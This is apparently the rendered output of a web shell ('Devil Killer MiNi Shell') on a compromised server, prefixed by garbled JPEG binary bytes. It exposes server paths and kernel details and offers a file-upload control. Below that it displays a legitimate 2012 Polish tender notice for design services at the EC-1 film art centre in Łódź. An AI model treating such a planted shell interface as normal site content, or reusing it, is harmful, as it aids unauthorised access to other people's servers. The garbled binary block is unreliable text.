JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120628/224788-N-2012.html

<p class="kh_header"><b>Łódź: Usługi kompleksowego projektowania specjalistycznego w zakresie technologii studyjnej, konferencyjnej i estradowej wraz z wielobranżowym projektem architektoniczno-instalacyjnym wynikającym z potrzeb technologicznych wybranych obszarów Centrum Sztuki Filmowej powstającego w ramach realizacji projektu pn. Rewitalizacja EC-1 i jej adaptacja na cele kulturalno-artystyczne - Zadanie 1  EC-1 Wschód.

nr postępowania: ZP-11-06- 2012</b><br>
<b>Numer ogłoszenia: 224788 - 2012; data zamieszczenia: 28.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "EC1 Łódź-Miasto Kultury" w Łodzi , ul. Targowa 1/3, 90-022 Łódź, woj. łódzkie, tel. 42 638 59 53, faks 42 638 59 58.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi kompleksowego projektowania specjalistycznego w zakresie technologii studyjnej, konferencyjnej i estradowej wraz z wielobranżowym projektem architektoniczno-instalacyjnym wynikającym z potrzeb technologicznych wybranych obszarów Centrum Sztuki Filmowej powstającego w ramach realizacji projektu pn. Rewitalizacja EC-1 i jej adaptacja na cele kulturalno-artystyczne - Zadanie 1  EC-1 Wschód.

nr postępowania: ZP-11-06- 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa kompleksowego projektowania specjalistycznego 
w zakresie technologii studyjnej, konferencyjnej i estradowej wraz z wielobranżowym projektem architektoniczno-instalacyjnym wynikającym z potrzeb technologicznych wybranych obszarów Centrum Sztuki Filmowej, powstającego w ramach realizacji projektu pn. Rewitalizacja EC-1 i jej adaptacja na cele kulturalno-artystyczne - Zadanie 1  EC-1 Wschód. Przedmiotem umowy jest również prowadzenie nadzoru autorskiego nad realizacją opracowanej przez Wykonawcę dokumentacji we wszystkich specjalnościach, w szczególności w branżach: architektura, konstrukcja, instalacje elektryczne, niskoprądowe, sanitarne, wentylacja, klimatyzacja, akustyka, technologia studyjna, konferencyjna i estradowa.
Kompleks studiów powstający w ramach Centrum Sztuki Filmowej zlokalizowany 
w EC-1 Wschód przeznaczony jest do profesjonalnej obsługi produkcji filmowych 
w zakresie realizacji obrazu i dźwięku. Celem studia jest zapewnienie twórcom filmowym technologicznych możliwości produkcji filmowej na poziomie uznawanym w branży filmowej za aktualnie obowiązujący międzynarodowy standard wysokiej klasy. W szczególności dotyczy to sekcji dźwiękowej, której dedykowane są najważniejsze pomieszczenia w obiekcie. Ponadto, w obiekcie EC-1 Wschód zlokalizowane są sale użyteczności publicznej przeznaczone do celów koncertowych, wystawienniczych, konferencyjnych, klubowych oraz jedna sala planetarium wraz z kinem 3D. Wyposażenie technologiczne poszczególnych sekcji obiektu umożliwiające realizację profesjonalnych produkcji filmowych będzie umożliwiało również prowadzenie działalności edukacyjnej.
Z uwagi na wyjątkowość tworzonego Centrum Sztuki Filmowej, jego prestiżowy międzynarodowy charakter, o zamówienie mogą ubiegać się zespoły projektowe, składające się ze specjalistów posiadających wymagane wykształcenie i doświadczenie 
w przygotowaniu wielobranżowych projektów akustycznych i technologicznych oraz posiadające bogate, wieloletnie doświadczenie w kompleksowym projektowaniu technologicznym obiektów koncertowych i studyjnych, w szczególności przeznaczonych dla nagrań muzycznych w pełnym składzie orkiestry symfonicznej wraz z chórem. 
Z uwagi na fakt, iż obiekt jest wpisany do rejestru zabytków i objęty ochroną Wojewódzkiego Konserwatora Zabytków, wymagane jest doświadczenie przy projektowaniu tego rodzaju obiektów. 
3.1.  Szczegółowy opis przedmiotu zamówienia zakres projektowania. 
Zamówienie dotyczy:
1. Opracowania specjalistycznych projektów technologii studyjnej, konferencyjnej i estradowej wraz z wielobranżowym projektem wykonawczym  architektoniczno-instalacyjnym, zawierających opracowania specjalistyczne w następujących branżach:
1.	Technologia studyjna, estradowa i konferencyjna.
2.	Ochrona przeciwdźwiękowa.
3.	Akustyka wnętrz.
4.	System inspicjenta zintegrowany z DSO Dźwiękowym Systemem Ostrzegawczym obejmujący: system komunikacji interkomowej przewodowej 
i bezprzewodowej typu punkt-punkt, techniczny podgląd obrazu, system rozgłaszania komunikatów słownych.
5.	Systemy nagrywania, edytowania, miksowania dźwięku.
6.	Systemy post-produkcji obrazu.
7.	Systemy nagłaśniania.
8.	Cyfrowa sieć audio i wideo.
9.	Systemy konferencyjne wraz ze sterowaniem.
10.	Górna mechanika estradowa.
11.	Oświetlenie estradowe.
12.	Wytyczne dla systemu multimedialnego planetarium wraz z kinem 3D.
13.	Wytyczne dla systemów multimedialnych w pomieszczeniach deweloperskich klub jazzowy, klub tańca, sale restauracyjne, które będą realizowane przez ich najemców. 
14.	Architektura wnętrz.
15.	Konstrukcja.
16.	Zasilanie elektryczne systemów technologii studyjnej.
17.	Instalacje elektryczna i oświetleniowa.
18.	Instalacje wentylacji i klimatyzacji.
19.	Instalacje sanitarne.
20.	Instalacje niskoprądowe.
Wymagania oraz wytyczne dla zamawianego kompletu projektów technologicznych, architektonicznych i instalacyjnych zamieszczone są w:
1.	Szczegółowym opisie zamawianych opracowań zamieszczonym w punktach 3.1. i  3.1.1 SIWZ.
2.	Załączniku nr 1: Program Funkcjonalno Użytkowy. Rewitalizacja EC-1 Łódź i jej adaptacja na cele kulturalno-artystyczne. Zadanie 1 - Rewitalizacja EC-1 Wschód- część rysunkowa.
3.	Załączniku nr 2: Projekt Budowlany. Rewitalizacja EC-1 Łódź i jej adaptacja na cele kulturalno-artystyczne. Zadanie 1 - Rewitalizacja EC-1 Wschód.
4.	Załączniku nr 3: Projekty wykonawcze instalacji: sanitarnej, klimatyzacji, wentylacji, elektrycznych i niskoprądowych. 
5.	Załączniku nr 4: Elementy wyposażenia w specjalistyczne urządzenia w Centrum Sztuki Filmowej.
W pomieszczeniach objętych zamawianym projektowaniem są już wykonywane roboty budowlane w następującym zakresie:
	Pomieszczenia, które zostaną doprowadzone do stanu deweloperskiego tzn. surowego zamkniętego z instalacjami elektrycznymi, wentylacyjnymi, klimatyzacyjnymi, sanitarnymi i niskoprądowymi doprowadzonymi do granic tych pomieszczeń:
- budynek N, pomieszczenie nr -2.N.7. Planetarium wraz z kinem 3D
- budynek N, pomieszczenie nr 2.N.9c. Pomieszczenie techniczne
- budynek N, pomieszczenie nr 2.N.9d. Pomieszczenie udźwiękowiania filmów
- budynek N, pomieszczenie nr 2.N.11a. Reżyserka
- budynek N, pomieszczenie nr 2.N.11c. Pokój dla wokalu
- budynek N, pomieszczenie nr 2.N.11f. Urządzenia
- budynek N, pomieszczenie nr 2.N.15. Studio nagrań muzycznych
- budynek N, pomieszczenia nr: 2N Serwerownia, Pomieszczenia techniczne-centralna maszynownia
- budynek N, pomieszczenie nr   3.N.4. Pracownie post-produkcji filmowej - audio
- budynek N, pomieszczenie nr 3.N.9. Operatorka
- budynek N, pomieszczenie nr 3.N.11. Pomieszczenie techniczne
- budynek N, pomieszczanie nr 4.N.4. Post-produkcja filmowa + kabina  
- budynek N, pomieszczenie nr 4.N.6. Pracownie - 2D, 3D, Motion Capture
- budynek N, pomieszczenie nr  4.N.9b. Post-produkcja DI + Blu Ray, DVD, DCI
- budynek S1, pomieszczenia nr 0.S1.14a, 0.S1.14b, 0.S1.14c. Pub filmowy - sale
- budynek S1, pomieszczenie nr 2.S1.11a. Sala restauracyjna
- budynek S2, pomieszczenie nr -1.S2.11. Centrum muzyki popularnej sala
- budynek S2, pomieszczenie nr -1.S2.17. Jazz klub sala
- budynek S2, pomieszczenie nr -1.S2.18. Jazz klub bar

pomieszczenia, które zostaną w pełni wykończone bez specjalistycznego wyposażenia ruchomego:
- budynek S2, pomieszczenie nr 0.S2.7. Galeria sala koncertowo-wielofunkcyjna
- budynek S2, pomieszczenie nr 2.S2.8. Sale konferencyjne
- budynek S2, pomieszczenia nr: 1.S2.7., 2.S2.10. Sale restauracyjne

Zadaniem wyłonionego w tym postępowaniu zespołu projektowego będzie opracowanie specjalistycznych projektów technologii studyjnej, konferencyjnej i estradowej wraz z wielobranżowymi projektami architektoniczno-instalacyjnymi umożliwiającymi przeprowadzenie odrębnego postępowania przetargowego na roboty, dostawy i usługi 
w następującym zakresie:
	instalacji elektrycznych, oświetleniowych, sanitarnych, wentylacyjnych, klimatyzacyjnych i niskoprądowych.
	adaptacji akustycznej pomieszczeń,
	wyposażenia sprzętowego, materiałowego i meblowego związanego z technologią studyjną, konferencyjną i estradową,
	aranżacji i wykończenia dla pomieszczeń: 
- budynek N, pomieszczenie nr 2.N.9c. Pomieszczenie techniczne
- budynek N, pomieszczenie nr 2.N.9d. Pomieszczenie udźwiękowiania filmów
- budynek N, pomieszczenie nr 2.N.11a. Reżyserka
- budynek N, pomieszczenie nr 2.N.11c. Pokój dla wokalu
- budynek N, pomieszczenie nr 2.N.11f. Urządzenia
- budynek N, pomieszczenie nr 2.N.15. Studio nagrań muzycznych
- budynek N, pomieszczenia nr: 2N Serwerownia, Pomieszczenia techniczne-centralna maszynownia
- budynek N, pomieszczenie nr   3.N.4. Pracownie post-produkcji filmowej - audio
- budynek N, pomieszczenie nr 3.N.9. Operatorka
- budynek N, pomieszczenie nr 3.N.11. Pomieszczenie techniczne
- budynek N, pomieszczanie nr 4.N.4. Post-produkcja filmowa + kabina  
- budynek N, pomieszczenie nr 4.N.6. Pracownie - 2D, 3D, Motion Capture
- budynek N, pomieszczenie nr  4.N.9b. Post-produkcja DI + Blu Ray, DVD, DCI

wytycznych dla aranżacji i wykończenia pomieszczeń:
 - budynek N, pomieszczenie nr -2.N.7. Planetarium wraz z kinem 3D
- budynek S1, pomieszczenia nr 0.S1.14a, 0.S1.14b, 0.S1.14c. Pub filmowy - sale
- budynek S1, pomieszczenie nr 2.S1.11a. Sala restauracyjna
- budynek S2, pomieszczenie nr -1.S2.11. Centrum muzyki popularnej sala
- budynek S2, pomieszczenie nr -1.S2.17. Jazz klub sala
- budynek S2, pomieszczenie nr -1.S2.18. Jazz klub bar

wytycznych dla optymalizacji akustyki pomieszczeń w pełni wykończonych:
- budynek S2, pomieszczenie nr 0.S2.7. Galeria sala koncertowo-wielofunkcyjna
- budynek S2, pomieszczenie nr 2.S2.8. Sale konferencyjne
- budynek S2, pomieszczenia nr: 1.S2.7., 2.S2.10. Sale restauracyjne


2.	Pełnienia nadzoru autorskiego.

Wykonawca będzie miał obowiązek pełnić nadzór autorski nad realizacją robót, dostaw i usług, objętych opracowaną dokumentacją, we wszystkich branżach będących przedmiotem zamówienia. Nadzór autorski należy pełnić przez cały okres realizacji robót, dostaw i usług,  z częstotliwością dostosowaną do postępu prac w poszczególnych okresach realizacji. 
Nadzór autorski będzie polegał na sprawdzeniu i stwierdzeniu zgodności realizacji robót, dostaw i usług z opracowaną przez Wykonawcę dokumentacją projektową. 
W szczególności nadzór obejmować będzie następujący zakres obowiązków:
a.	opiniowanie kart technologicznych sprzętu i materiałów, przedłożonych przez wykonawców robót, dostaw i usług, poprzez ich zatwierdzenie lub odrzucenie, w terminie do 7 dni od daty otrzymania karty technologicznej, o ile Zamawiający nie wyznaczy innego terminu, 
b.	bieżącą weryfikację parametrów technicznych dostarczanego sprzętu 
i materiałów potwierdzających osiągnięcie założonych wskaźników określonych w dokumentacji projektowej,
c.	uczestnictwo w odbiorach robót, dostaw i usług i zgłaszanie na tej podstawie uwag i zastrzeżeń co do zgodności wykonanych robót, dostaw i usług 
z dokumentacją projektową opracowaną przez Wykonawcę. Zamawiający będzie każdorazowo informował Wykonawcę o terminach odbiorów, co najmniej z 5 dniowym wyprzedzeniem,
d.	wykonywanie pomiarów akustycznych w pomieszczeniach objętych zamówieniem oraz innych niezbędnych pomiarów potwierdzających osiągnięcie założonych wskaźników określonych w dokumentacji projektowej,
e.	uczestnictwo stosownie do potrzeb w spotkaniach i naradach organizowanych przez Zamawiającego wraz z wizytacją pomieszczeń, w których będą realizowane roboty, dostawy i usługi, jednakże nie częściej niż dwa razy 
w miesiącu,
f.	udzielanie pisemnych wyjaśnień, odpowiedzi lub stanowisk w kwestiach dotyczących dokumentacji projektowych, zgłoszonych przez Zamawiającego lub wykonawców robót, dostaw i usług, w terminie wyznaczonym przez Zamawiającego nie krótszym jednak niż 3 dni robocze.  
Wykonawcy robót, dostaw i usług technologii studyjnej, konferencyjnej i estradowej, wyłonieni zostaną w odrębnych postępowaniach o udzielenie zamówienia publicznego.
Opis pomieszczeń objetych zamawianym projketem znajduje się w SIWZ na stronie internetowej Zamawiającego www.bip.ec1lodz.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.10.00-4, 71.24.00.00-2, 71.22.00.00-6, 71.24.80.00-8, 71.31.31.00-6, 90.74.20.00-0, 71.31.32.00-7, 79.93.20.00-6, 71.32.31.00-9, 71.32.00.00-7, 71.62.19.00-7, 71.31.60.00-6, 72.21.25.00-4, 72.21.29.60-6, 71.35.00.00-6, 79.93.40.00-0, 71.31.81.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże spełnienie warunku, jeżeli złoży oświadczenie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych-  O spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował usługi objęte przedmiotem zamówienia tj.:
1.	Kompleksowy projekt wykonawczy technologii studyjnej, konferencyjnej i estradowej dla jednego obiektu w zakresie: 
a.	akustyka wnętrza, ochrona przeciwdźwiękowa dla minimum dwóch pomieszczeń o parametrach:
i.	sala koncertowa filharmoniczna lub operowa lub studio nagrań muzyki orkiestrowej o kubaturze nie mniejszej niż: 3 500 m3, 
ii.	studio nagrań muzyki orkiestrowej lub sala prób lub sala koncertowa o kubaturze nie mniejszej niż: 800 m3,
b.	system inspicjenta obejmujący następujące elementy: system komunikacji -interkomowej bezprzewodowej i przewodowej typu punkt-punkt, techniczny podgląd obrazu, system rozgłaszania komunikatów słownych, zintegrowany na poziomie rozgłaszania komunikatów słownych z systemem DSO (dźwiękowym systemem ostrzegawczym).
c.	system nagłaśniania dla pomieszczeń o parametrach: 
i.	sala filharmoniczna lub sala operowa o kubaturze: 3 500 m3, liczbie miejsc minimum 250,
d.	system transmisji sygnałów fonicznych oraz system rejestracji wielośladowej bazujący na cyfrowej sieci fonicznej,
e.	mechanika estradowa/sceniczna dla sali koncertowej filharmonicznej lub operowej lub studia nagrań muzyki orkiestrowej o kubaturze nie mniejszej niż: 3 500 m3,
f.	oświetlenie efektowe dla sali koncertowej filharmonicznej lub operowej o kubaturze nie mniejszej niż: 3 500 m3, 
g.	technologia estradowa dla budynku zwierającego:
i.	salę koncertową filharmoniczną lub operową o kubaturze nie mniejszej niż: 3 500 m3,
ii.	salę prób orkiestry lub studio nagraniowe lub salę koncertową o kubaturze nie mniejszej niż: 800 m3,
iii.	magazyn instrumentów.
w minimum trzech ogólnodostępnych obiektach wymienionych w dziale: 12 grupie: 126 klasa: 1261 Polskiej Klasyfikacji Obiektów Budowlanych (domy kultury, teatry, opery, filharmonie) oraz przedłoży dokumenty potwierdzające, że projekty te zostały wykonane zgodnie z zasadami sztuki. 
Zamawiający wymaga, aby wartość przynajmniej jednej kompleksowej usługi nie była mniejsza niż 800.000,00 PLN.
2.	Kompleksowy projekt wykonawczy dla jednego obiektu w zakresie:
a.	system rejestracji wielośladowej i miksowania audio bazujący na cyfrowej sieci fonicznej obejmujący swym zakresem kompleks nagraniowy składający się z następujących pomieszczeń:
i.	dwie reżysernie nagraniowe,
ii.	dwa studia nagraniowe o kubaturze odpowiednio: 800 m3, 3 500 m3, (jako studia rozumie się sale zaprojektowane m.in. do nagrywania muzyki orkiestrowej: salę filharmoniczną, salę operową, salę prób orkiestry, salę koncertową, studio nagraniowe)
w minimum dwóch ogólnodostępnych obiektach wymienionych w dziale: 12 grupie: 126 klasa: 1261 Polskiej Klasyfikacji Obiektów Budowlanych (domy kultury, teatry, opery, filharmonie) oraz przedłoży dokumenty potwierdzające, że projekty te zostały wykonane zgodnie z zasadami sztuki. 
Zamawiający wymaga, aby wartość każdej z wykazanych usług nie była mniejsza niż 100.000,00 PLN.
W celu udokumentowania doświadczenia Wykonawcy, należy przedstawić wykaz opracowanych dokumentacji projektowych, zgodnie z Formularzem nr 4, potwierdzony przez załączone kopie dokumentów wystawionych przez Zamawiających poświadczające należyte wykonanie wskazanych usług. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże spełnienie warunku, jeżeli złoży oświadczenie z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych-  O spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli wykaże dysponowanie wymienionymi poniżej osobami i przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonywać niżej wymienione funkcje:
1.	Trzema projektantami akustyki wnętrza, ochrony przeciwdźwiękowej, elektroakustyki, z których każdy spełnia następujące kryteria:

a) ukończył studia wyższe w specjalności Akustyka obronił pracę magisterską, co najmniej 10 lat przed dniem ogłoszenia niniejszego postępowania przetargowego. W celu udokumentowania spełnienia powyższego warunku należy przedstawić kopię dyplomu ukończenia studiów wyższych w specjalności Akustyka.
b) w okresie ostatnich trzech lat był autorem lub współautorem minimum trzech dokumentacji projektowych w zakresie określonym w SIWZ w pkt. 6.1.2. w ppkt. 1. W celu udokumentowania spełnienia powyższego warunku należy przedstawić wykaz dokumentacji projektowych, których poszczególni projektanci byli autorami lub współautorami, zgodnie z Formularzem nr 5.

2.	Projektantem architektury, który spełnia następujące kryteria:
a) uzyskał uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń co najmniej 10 lat przed dniem ogłoszenia niniejszego postępowania przetargowego. W celu udokumentowania doświadczenia projektanta architektury należy przedstawić kopie nadania uprawnień budowlanych do projektowania i kierowania robotami budowlanymi w specjalności architektonicznej bez ograniczeń oraz aktualnego potwierdzenia przynależności do Izby Architektonicznej. 
b) w okresie ostatnich 3 lat przed ogłoszeniem niniejszego postępowania przetargowego był autorem lub współautorem dwóch dokumentacji projektowych dotyczących obiektów publicznych, z których przynajmniej jeden obiekt był wpisany do rejestru zabytków i zawierał minimum jedno pomieszczenie typu sala wystawiennicza, kinowa, audytoryjna, koncertowa, studyjna o kubaturze minimum 5 000 m3. 
W celu udokumentowania doświadczenia projektanta architektury należy przedstawić wykaz dokumentacji projektowych, których jest autorem lub współautorem zgodnie z Formularzem nr 5.

3) Projektantem konstrukcji, który spełnia następujące warunki:
a) uzyskał uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej co najmniej 10 lat przed dniem ogłoszenia niniejszego postępowania przetargowego. 
W celu udokumentowania doświadczenia projektanta konstrukcji należy przedstawić kopie nadania uprawnień budowlanych do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz aktualne potwierdzenie przynależności do Izby Inżynierów Budownictwa,
b) w okresie ostatnich 3 lat przed ogłoszeniem niniejszego postępowania przetargowego był autorem lub współautorem dwóch dokumentacji projektowych dotyczących obiektów publicznych, z których przynajmniej jeden obiekt był wpisany do rejestru zabytków i zawierał minimum jedno pomieszczenie typu sala wystawiennicza, kinowa, audytoryjna, koncertowa, studyjna o kubaturze minimum 5 000 m3. W celu udokumentowania doświadczenia należy przedstawić wykaz dokumentacji projektowych, które współtworzył zgodnie z Formularzem nr 5.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej*. Za Wykonawcę znajdującego się w sytuacji ekonomicznej gwarantującej wykonanie zamówienia Zamawiający uzna takiego, który jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 200 000,00 zł PLN**. 

*Zgodnie z art. 26 ust.2b ustawy Prawo zamówień publicznych w zakresie wyżej opisanego warunku dotyczącego sytuacji ekonomicznej wykonawcy nie mogą polegać na zdolnościach i potencjale innych podmiotów 

**Jeśli kwota wskazana jest w innej walucie niż PLN wykonawca zobowiązany jest dokonać przeliczenia tej kwoty na PLN przyjmując, jako podstawę średni kurs danej waluty opublikowany przez NBP (wg tabeli A kursów średnich walut obcych) w dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej. Jeśli publikacja ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej nastąpi w dniu, kiedy NBP nie publikuje tabeli kursów średnich, należy przyjąć kurs z tabeli kursów średnich opublikowany w dniu najbliższym po dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej.

